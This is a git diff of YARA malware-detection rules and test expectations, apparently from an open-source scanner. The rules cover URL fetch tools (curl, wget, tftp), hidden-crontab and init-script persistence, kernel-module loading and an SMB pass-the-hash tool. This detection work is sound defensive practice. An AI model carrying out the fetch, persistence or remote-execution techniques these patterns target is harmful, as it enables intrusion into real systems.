+ filesize < 2MB and all of them
}
diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara
index 255614bc7..55ad3f1cf 100644
--- a/rules/net/dns/dns-over-https.yara
+++ b/rules/net/dns/dns-over-https.yara
@@ -11,6 +11,7 @@ rule doh_refs: medium {
$contentType = "application/dns-message"
$dnspod = "dnspod"
$doh_url = "doh-url" fullword
+ $cloudflare = "https://9.9.9.9/dns-query"
condition:
any of them
diff --git a/rules/net/download/fetch.yara b/rules/net/download/fetch.yara
index 9850a4323..46f74f9d1 100644
--- a/rules/net/download/fetch.yara
+++ b/rules/net/download/fetch.yara
@@ -47,33 +47,33 @@ rule fetch_tool: medium {
description = "calls a URL fetch tool"
strings:
- $t_curl_O = "curl -O"
- $t_curl_o = "curl -o"
- $t_wget = "wget -"
- $t_wget_http = "wget http"
- $t_quiet_output = "-q -O "
- $t_kinda_curl_o = "url -o "
- $t_kinda_curl_O = "url -O "
- $t_kinda_curl_silent_insecure = "silent --insecure"
- $t_kinda_curl_qk = /url.{0,4}-k -q/
- $t_ftp = "ftp -"
- $t_tftp = "tftp "
- $t_ftpget = "ftpget " fullword
+ $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.]{0,32}/
+ $t_wget = /wget [ \w\:\/\-\.]{4,32}/
+ $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.]{0,32}/
+ $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/
+ $t_tftp = /tftp [ \w\:\/\-\.]{0,32}/
condition:
- filesize < 5MB and any of ($t_*)
+ filesize < 1MB and any of ($t_*)
}
-rule executable_calls_fetch_tool: high {
+rule binary_calls_fetch_tool: high {
meta:
- description = "executable that calls a fetch tool"
+ description = "binary calls fetch tool"
filetypes = "macho,elf"
strings:
- $not_tftp = "Illegal TFTP operation"
+ $t_curl_O = /[a-z]url [-\w ]{0,8}-[oOk] [ \w\:\/\-\.\"]{0,32}/
+ $t_wget = /wget [ \w\:\/\-\.\"]{4,32}/
+ $t_curl_qk = /[a-z]url [-\w ]{0,16} -(-silent|q) -(-insecure|k) [ \w\:\/\-\.\"]{0,32}/
+ $t_curl_kq = /[a-z]url [-\w ]{0,16} -(-insecure|k) -(-silent|q) [ \w\:\/\-\.]{0,32}/
+ $t_tftp = /tftp [ \w\:\/\-\.\"]{0,32}/
+
+ $not_tftp = "Illegal TFTP operation"
+ $not_tftp_err = "tftp error"
condition:
- filesize < 5MB and (elf or macho) and fetch_tool and none of ($not*)
+ filesize < 10MB and (elf or macho) and any of ($t*) and none of ($not*)
}
rule curl_agent_val: high {
@@ -138,6 +138,7 @@ rule high_fetch_command_val: high {
$not_s_key = "curl -s --key"
$not_local = "curl -ks https://localhost"
$not_continue = "--continue-at"
+ $not_pciid = "https://pci-ids.ucw.cz"
$x_chmod = "chmod" fullword
$x_Chmod = "Chmod" fullword
diff --git a/rules/net/ftp/tftp.yara b/rules/net/ftp/tftp.yara
new file mode 100644
index 000000000..b1f17f574
--- /dev/null
+++ b/rules/net/ftp/tftp.yara
@@ -0,0 +1,11 @@
+rule tftp {
+ meta:
+ description = "Trivial File Transfer Protocol (TFTP)"
+
+ strings:
+ $ref = "tftp" fullword
+ $ref2 = "TFTP" fullword
+
+ condition:
+ filesize < 1MB and any of them
+}
diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara
index 5891a27fa..9b37a7ac3 100644
--- a/rules/net/ip/spoof.yara
+++ b/rules/net/ip/spoof.yara
@@ -6,9 +6,11 @@ rule spoof: medium {
hash_2022_devicespoofer_2_2_setup = "195d69dc251a045b01fdd6854327c545283b36ebae7c54e06599b14b50ec39e6"
strings:
- $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
- $Spoof = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword
+ $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword
+ $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword
+
+ $not_chk = "Spoofchk"
condition:
- any of them
+ any of ($s*) and none of ($not*)
}
diff --git a/rules/persist/cron/echo_crontab.yara b/rules/persist/cron/echo_crontab.yara
deleted file mode 100644
index 3a2ed0633..000000000
--- a/rules/persist/cron/echo_crontab.yara
+++ /dev/null
@@ -1,12 +0,0 @@
-rule echo_crontab: high {
- meta:
- hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de"
- hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
- hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
-
- strings:
- $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/
-
- condition:
- $echo
-}
diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara
new file mode 100644
index 000000000..9f7721074
--- /dev/null
+++ b/rules/persist/cron/etc_cron_d.yara
@@ -0,0 +1,12 @@
+rule cron_d_user: high {
+ meta:
+ description = "Uses /etc/cron.d to persist"
+
+ strings:
+ $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/
+
+ $not_usage = "usage: cron"
+
+ condition:
+ filesize < 52428800 and any of ($c*) and none of ($not*)
+}
diff --git a/rules/persist/cron/hidden_crontab.yara b/rules/persist/cron/hidden_crontab.yara
deleted file mode 100644
index 9743db792..000000000
--- a/rules/persist/cron/hidden_crontab.yara
+++ /dev/null
@@ -1,17 +0,0 @@
-rule hidden_crontab: critical {
- meta:
- description = "persists via a hidden crontab entry"
- hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
- hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
- hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99"
-
- strings:
- $crontab = "crontab"
- $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
- $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
-
- condition:
- $crontab and any of ($c_*)
-}
diff --git a/rules/persist/cron/crontab.yara b/rules/persist/cron/tab.yara
similarity index 64%
rename from rules/persist/cron/crontab.yara
rename to rules/persist/cron/tab.yara
index 20ac884bc..c3720fe5c 100644
--- a/rules/persist/cron/crontab.yara
+++ b/rules/persist/cron/tab.yara
@@ -17,7 +17,6 @@ rule crontab_writer: medium {
hash_2023_ZIP_server = "b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4"
strings:
- $c_etc_crontab = /\/etc\/cron[\/\w\.]{0,32}/
$c_crontab_e = "crontab -"
$c_var_spool_cron = "/var/spool/cron"
$not_usage = "usage: cron"
@@ -66,3 +65,34 @@ rule crontab_danger_path: high {
condition:
filesize < 104857600 and any of them
}
+
+rule hidden_crontab: critical {
+ meta:
+ description = "persists via a hidden crontab entry"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+ hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99"
+
+ strings:
+ $crontab = "crontab"
+ $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+
+ condition:
+ $crontab and any of ($c_*)
+}
+
+rule echo_crontab: high {
+ meta:
+ hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+
+ strings:
+ $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/
+
+ condition:
+ $echo
+}
diff --git a/rules/persist/kernel_module/module-load.yara b/rules/persist/kernel_module/insert.yara
similarity index 82%
rename from rules/persist/kernel_module/module-load.yara
rename to rules/persist/kernel_module/insert.yara
index 7f64e2059..05254583e 100644
--- a/rules/persist/kernel_module/module-load.yara
+++ b/rules/persist/kernel_module/insert.yara
@@ -1,29 +1,23 @@
-rule init_module: medium linux {
+rule kernel_module_loader: high linux {
meta:
- description = "Linux kernel module"
- syscall = "init_module"
- capability = "CAP_SYS_MODULE"
- hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
- hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "ko,elf,so"
+ description = "loads Linux kernel module via insload"
+ hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
strings:
- $ref = "init_module" fullword
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32}/
condition:
- filesize < 1MB and all of them
+ filesize < 10MB and all of them
}
-rule kernel_module_loader: high linux {
+rule kernel_module_loader_sus: high linux {
meta:
- description = "loads Linux kernel module via insload"
- hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ description = "suspiciously loads Linux kernel module via insload"
strings:
- $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/
condition:
filesize < 10MB and all of them
@@ -41,3 +35,21 @@ rule cha_cha_tests: override linux {
condition:
filesize < 2KB and any of them
}
+
+rule init_module: medium linux {
+ meta:
+ description = "Linux kernel module"
+ syscall = "init_module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ filetypes = "ko,elf,so"
+
+ strings:
+ $ref = "init_module" fullword
+
+ condition:
+ filesize < 1MB and all of them
+}
+
diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara
index a0833f10c..028c50111 100644
--- a/rules/persist/kernel_module/module.yara
+++ b/rules/persist/kernel_module/module.yara
@@ -1,6 +1,8 @@
+import "elf"
+
rule lkm: medium {
meta:
- description = "Contains a Linux kernel module"
+ description = "Linux kernel module"
capability = "CAP_SYS_MODULE"
hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
@@ -14,6 +16,22 @@ rule lkm: medium {
all of them
}
+rule lkm_embedded_in_elf: high {
+ meta:
+ description = "Contains embedded Linux kernel module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ hash_2023_LQvKibDTq4_diamorphine_mod = "e394d87045c800a63bd4d295e635ff8a03624255c3fd85fe8e6957807f1cb569"
+
+ strings:
+ $vergmagic = "vermagic="
+ $srcversion = "srcversion="
+
+ condition:
+ elf.type == elf.ET_EXEC and all of them
+}
+
rule delete_module: medium {
meta:
description = "Unload Linux kernel module"
diff --git a/rules/persist/kernel_module/symbol-lookup.yara b/rules/persist/kernel_module/symbol-lookup.yara
index bfdbd8034..f135f28a2 100644
--- a/rules/persist/kernel_module/symbol-lookup.yara
+++ b/rules/persist/kernel_module/symbol-lookup.yara
@@ -40,3 +40,18 @@ rule bpftrace: override linux {
condition:
filesize < 2MB and any of them
}
+
+rule bpf: override linux {
+ meta:
+ description = "libbpf"
+ filetypes = "so,elf"
+ kallsyms_lookup = "medium"
+ proc_d_exe_high = "medium"
+
+ strings:
+ $ref = "BPF" fullword
+ $ref2 = "LIBBPF" fullword
+
+ condition:
+ filesize < 2MB and any of them
+}
diff --git a/rules/persist/service/install.yara b/rules/persist/service/install.yara
new file mode 100644
index 000000000..cc7c79dca
--- /dev/null
+++ b/rules/persist/service/install.yara
@@ -0,0 +1,27 @@
+rule register_service_start: windows medium {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+
+ condition:
+ filesize < 5MB and all of them
+}
+
+rule register_service_start_high: windows high {
+ meta:
+ description = "installs and starts a Windows Service"
+
+ strings:
+ $s_install = "RegisterServiceCtrlHandlerA"
+ $s_create = "CreateServiceA"
+ $s_start = "StartServiceA"
+ $o_netsh = "netsh"
+ $o_filter = "SetUnhandledExceptionFilter"
+
+ condition:
+ filesize < 200KB and all of ($s*) and any of ($o*)
+}
diff --git a/rules/persist/sysv/sysv.yara b/rules/persist/sysv/sysv.yara
new file mode 100644
index 000000000..aac9e05dc
--- /dev/null
+++ b/rules/persist/sysv/sysv.yara
@@ -0,0 +1,11 @@
+rule sysv_persist: high {
+ meta:
+ description = "installs arbitrary files into SYSV-style init directories"
+
+ strings:
+ $rc_d = "/etc/rc%d.d/S%d%s"
+ $init_d = "/etc/init.d/%s"
+
+ condition:
+ filesize < 5MB and any of them
+}
diff --git a/rules/process/thread_local_storage.yara b/rules/process/thread_local_storage.yara
deleted file mode 100644
index 493a44223..000000000
--- a/rules/process/thread_local_storage.yara
+++ /dev/null
@@ -1,11 +0,0 @@
-rule tls_get_addr {
- meta:
- description = "Uses glibc thread local storage"
- ref = "https://chao-tic.github.io/blog/2018/12/25/tls"
-
- strings:
- $val = "__tls_get_addr" fullword
-
- condition:
- any of them
-}
diff --git a/rules/sec-tool/pentest/smbexec.yara b/rules/sec-tool/pentest/smbexec.yara
new file mode 100644
index 000000000..94a829082
--- /dev/null
+++ b/rules/sec-tool/pentest/smbexec.yara
@@ -0,0 +1,11 @@
+rule hacktool_smbexec: critical {
+ meta:
+ description = "execute commands on remote SMB host"
+
+ strings:
+ $hash = "user supplied NTLM HASH"
+ $hash2 = "HASH PASS: Substituting"
+
+ condition:
+ filesize < 100KB and any of them
+}
diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara
new file mode 100644
index 000000000..21f2a354d
--- /dev/null
+++ b/rules/sus/geopolitics.yara
@@ -0,0 +1,10 @@
+rule ukraine: medium {
+ meta:
+ description = "Glory to Ukraine!"
+
+ strings:
+ $ref = "слава Украине!"
+
+ condition:
+ any of them
+}
diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara
index 9c4540d06..080e8333b 100644
--- a/rules/sus/malicious.yara
+++ b/rules/sus/malicious.yara
@@ -5,8 +5,10 @@ rule malicious: medium {
strings:
$ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword
+ $not_sshd = "attempt by a malicious server"
+
condition:
- any of them
+ $ref and none of ($not*)
}
rule malici0us: high {
diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple
index af4355d54..605a4d85a 100644
--- a/tests/does-nothing/does-nothing.simple
+++ b/tests/does-nothing/does-nothing.simple
@@ -1,8 +1,8 @@
# does-nothing/does-nothing: medium
data/encoding/base64: low
data/encoding/json: low
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: low
exec/plugin: low
exec/program: medium
diff --git a/tests/javascript/2022.an-instance.99.10.9/index.js.simple b/tests/javascript/2022.an-instance.99.10.9/index.js.simple
index 3f22ff99b..75c6f215c 100644
--- a/tests/javascript/2022.an-instance.99.10.9/index.js.simple
+++ b/tests/javascript/2022.an-instance.99.10.9/index.js.simple
@@ -2,7 +2,7 @@
anti-static/obfuscation/hex: medium
data/encoding/json_encode: low
discover/network/interface_list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/user/info: medium
exfil/nodejs: critical
fs/directory/list: low
diff --git a/tests/javascript/clean/203.b7219352.chunk.js.simple b/tests/javascript/clean/203.b7219352.chunk.js.simple
index 0e5568b9b..68bb087d0 100644
--- a/tests/javascript/clean/203.b7219352.chunk.js.simple
+++ b/tests/javascript/clean/203.b7219352.chunk.js.simple
@@ -8,6 +8,7 @@ data/encoding/json_encode: low
discover/network/interface_list: medium
discover/network/mac_address: medium
discover/network/netstat: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
index c7776083d..0be4faad4 100644
--- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
+++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple
@@ -2,7 +2,6 @@
3P/threat_hunting/powershell: medium
c2/addr/ip: medium
c2/addr/server: medium
-c2/server_address: medium
collect/archives/unarchive: medium
collect/databases/mysql: medium
collect/databases/postgresql: medium
@@ -21,13 +20,15 @@ data/encoding/json_encode: low
data/encoding/reverse: low
data/random/insecure: low
discover/group/lookup: medium
+discover/process/egid: medium
+discover/process/parent: low
discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/cmd: medium
exec/conditional/LANG: low
@@ -91,9 +92,7 @@ persist/daemon: medium
process/chdir: low
process/chroot: low
process/create: low
-process/effective_groupid_get: medium
process/groupid_set: low
-process/parent_pid_get: low
process/userid_set: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
index 855e2c16f..be7062b83 100644
--- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
+++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple
@@ -2,7 +2,7 @@
3P/threat_hunting/powershell: medium
anti-static/obfuscation/js: medium
c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
collect/archives/unarchive: medium
collect/databases/mysql: medium
collect/databases/postgresql: medium
@@ -22,13 +22,15 @@ data/encoding/reverse: low
data/hash/md5: low
data/random/insecure: low
discover/group/lookup: medium
+discover/process/egid: medium
+discover/process/parent: low
discover/processes/list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/cmd: medium
exec/plugin: low
@@ -91,9 +93,7 @@ persist/daemon: medium
process/chdir: low
process/chroot: low
process/create: low
-process/effective_groupid_get: medium
process/groupid_set: low
-process/parent_pid_get: low
process/userid_set: low
sus/exclamation: medium
sus/intercept: medium
diff --git a/tests/javascript/clean/bash.js.simple b/tests/javascript/clean/bash.js.simple
index 13532d334..dbfc0600a 100644
--- a/tests/javascript/clean/bash.js.simple
+++ b/tests/javascript/clean/bash.js.simple
@@ -1,9 +1,10 @@
# javascript/clean/bash.js: medium
data/compression/bzip2: low
data/compression/gzip: low
+discover/multiple: medium
discover/network/interface_list: medium
discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/faker.js.simple b/tests/javascript/clean/faker.js.simple
index bb8797a29..8bd713980 100644
--- a/tests/javascript/clean/faker.js.simple
+++ b/tests/javascript/clean/faker.js.simple
@@ -14,7 +14,6 @@ data/embedded/base64_url: medium
data/encoding/base64: low
data/encoding/json_decode: low
data/encoding/json_encode: low
-evasion/hidden_paths/x11: low
exec/plugin: low
exfil/office_file_ext: medium
exfil/stealer/credit_card: medium
diff --git a/tests/javascript/clean/faker.min.js.simple b/tests/javascript/clean/faker.min.js.simple
index 87efb6b7e..5baafcaa1 100644
--- a/tests/javascript/clean/faker.min.js.simple
+++ b/tests/javascript/clean/faker.min.js.simple
@@ -9,7 +9,6 @@ data/compression/bzip2: low
data/compression/gzip: low
data/encoding/json_decode: low
data/encoding/json_encode: low
-evasion/hidden_paths/x11: low
exec/plugin: low
exfil/office_file_ext: medium
exfil/stealer/credit_card: medium
diff --git a/tests/javascript/clean/highlight.esm.js.simple b/tests/javascript/clean/highlight.esm.js.simple
index 698fc579b..ad9968262 100644
--- a/tests/javascript/clean/highlight.esm.js.simple
+++ b/tests/javascript/clean/highlight.esm.js.simple
@@ -20,10 +20,10 @@ discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/relative_hidden: low
exec/cmd: medium
exec/plugin: low
exec/program/background: low
+exec/program/hidden: medium
exec/remote_commands/code_eval: medium
exec/script/osa: medium
exec/shell/SHELL: low
diff --git a/tests/javascript/clean/highlight.js.simple b/tests/javascript/clean/highlight.js.simple
index f2585167d..1d6cc7135 100644
--- a/tests/javascript/clean/highlight.js.simple
+++ b/tests/javascript/clean/highlight.js.simple
@@ -20,10 +20,10 @@ discover/system/sysinfo: medium
discover/user/HOME: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/relative_hidden: low
exec/cmd: medium
exec/plugin: low
exec/program/background: low
+exec/program/hidden: medium
exec/remote_commands/code_eval: medium
exec/script/osa: medium
exec/shell/SHELL: low
diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple
index f70f60b70..98840f39b 100644
--- a/tests/javascript/clean/mode-php.js.simple
+++ b/tests/javascript/clean/mode-php.js.simple
@@ -11,11 +11,13 @@ data/encoding/base64: low
data/encoding/reverse: low
data/hash/md5: low
data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/plugin: low
exec/program: medium
@@ -57,7 +59,5 @@ net/url/embedded: low
net/url/encode: medium
persist/daemon: medium
process/chroot: low
-process/effective_groupid_get: medium
process/groupid_set: low
-process/parent_pid_get: low
process/userid_set: low
diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple
index 020791f13..a5f1f66b8 100644
--- a/tests/javascript/clean/mode-php_laravel_blade.js.simple
+++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple
@@ -11,11 +11,13 @@ data/encoding/base64: low
data/encoding/reverse: low
data/hash/md5: low
data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/plugin: low
exec/program: medium
@@ -57,7 +59,5 @@ net/url/embedded: low
net/url/encode: medium
persist/daemon: medium
process/chroot: low
-process/effective_groupid_get: medium
process/groupid_set: low
-process/parent_pid_get: low
process/userid_set: low
diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple
index 8a12e2499..57a0b5396 100644
--- a/tests/javascript/clean/php.js.simple
+++ b/tests/javascript/clean/php.js.simple
@@ -9,11 +9,13 @@ data/compression/gzip: low
data/encoding/base64: low
data/encoding/reverse: low
data/random/insecure: low
-discover/system/hostname_get: low
+discover/process/egid: medium
+discover/process/parent: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/USER: low
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
exec/plugin: low
exec/program: medium
@@ -53,7 +55,5 @@ net/socket/send: low
net/url/embedded: low
net/url/encode: medium
process/chroot: low
-process/effective_groupid_get: medium
process/groupid_set: low
-process/parent_pid_get: low
process/userid_set: low
diff --git a/tests/javascript/clean/prism-bash.js.simple b/tests/javascript/clean/prism-bash.js.simple
index 4a9c7f0a8..22517e6cc 100644
--- a/tests/javascript/clean/prism-bash.js.simple
+++ b/tests/javascript/clean/prism-bash.js.simple
@@ -1,9 +1,10 @@
# javascript/clean/prism-bash.js: medium
data/compression/bzip2: low
data/compression/gzip: low
+discover/multiple: medium
discover/network/interface_list: medium
discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/prism-bash.min.js.simple b/tests/javascript/clean/prism-bash.min.js.simple
index b20adfcd2..7849e6737 100644
--- a/tests/javascript/clean/prism-bash.min.js.simple
+++ b/tests/javascript/clean/prism-bash.min.js.simple
@@ -1,9 +1,10 @@
# javascript/clean/prism-bash.min.js: medium
data/compression/bzip2: low
data/compression/gzip: low
+discover/multiple: medium
discover/network/interface_list: medium
discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
diff --git a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
index 3c0d0badc..724f70e98 100644
--- a/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
+++ b/tests/javascript/clean/scripts.c88fecd373e21509.js.simple
@@ -4,9 +4,10 @@ data/compression/bzip2: low
data/compression/gzip: low
data/encoding/json_decode: low
data/encoding/json_encode: low
+discover/multiple: medium
discover/network/interface_list: medium
discover/network/netstat: medium
-discover/system/network: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/se: medium
diff --git a/tests/linux/2021.FontOnLake/45E9.elf.simple b/tests/linux/2021.FontOnLake/45E9.elf.simple
index 852001aa1..78b178759 100644
--- a/tests/linux/2021.FontOnLake/45E9.elf.simple
+++ b/tests/linux/2021.FontOnLake/45E9.elf.simple
@@ -11,17 +11,20 @@ crypto/aes: low
data/encoding/base64: low
data/hash/md5: low
discover/group/lookup: medium
-discover/system/hostname_get: low
+discover/system/dmesg: low
+discover/system/hostname: low
discover/user/HOME: low
discover/user/USER: low
evasion/bypass_security/linux/pam: medium
evasion/bypass_security/linux/se: medium
-evasion/hidden_paths/hidden: medium
-evasion/hidden_paths/proc: high
-evasion/hidden_paths/x11: low
+evasion/file/location/x11_unix: low
+evasion/file/prefix: medium
+evasion/file/prefix/proc: high
evasion/logging/acct: low
+evasion/logging/dmesg: critical
evasion/logging/failed_logins: medium
evasion/logging/historical_logins: medium
+evasion/rootkit/refs: high
exec/program: medium
exec/program/background: low
exec/shell/SHELL: low
@@ -57,11 +60,10 @@ fs/symlink_resolve: low
fs/tempdir/create: low
fs/tempdir/tempfile_create: low
impact/remote_access/agent: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
